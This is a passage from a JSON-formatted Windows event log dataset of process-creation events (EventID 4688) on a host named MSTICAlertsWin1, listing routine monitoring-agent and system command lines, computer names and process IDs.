Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessId\":[\"0x1610\",\"0x1790\",\"0xcd8\",\"0x28c\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x90c\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xb8\",\"0xd14\",\"0x1490\",\"0x148c\",\"0x1414\",\"0x1530\",\"0x7b4\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1694\",\"0x1658\",\"0x1740\",\"0xd14\",\"0x1094\",\"0x1270\",\"0xc10\",\"0x6ec\",\"0x1388\",\"0xc08\",\"0x364\",\"0x1338\",\"0x12fc\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x13e8\",\"0x6bc\",\"0x1254\",\"0x11b0\",\"0x1d0\",\"0x1070\",\"0x6ec\",\"0xc84\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x690\",\"0x123c\",\"0x244\",\"0xa10\",\"0xc54\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0x132c\",\"0x4e8\",\"0xcd8\",\"0x97c\",\"0x90c\",\"0xe68\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0xbdc\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1250\",\"0x140c\",\"0x142c\",\"0x1448\",\"0x1450\",\"0x1458\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0xbdc\",\"0x13a8\",\"0xa4\",\"0x1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x11cc\",\"0x99c\",\"0x11c4\",\"0xd14\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0xab8\",\"0xfbc\",\"0x1380\",\"0x5cc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x1694\",\"0x16c4\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17c0\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xd04\",\"0xc18\",\"0x13e4\",\"0x10e4\",\"0x90c\",\"0xfbc\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0xd78\",\"0x1054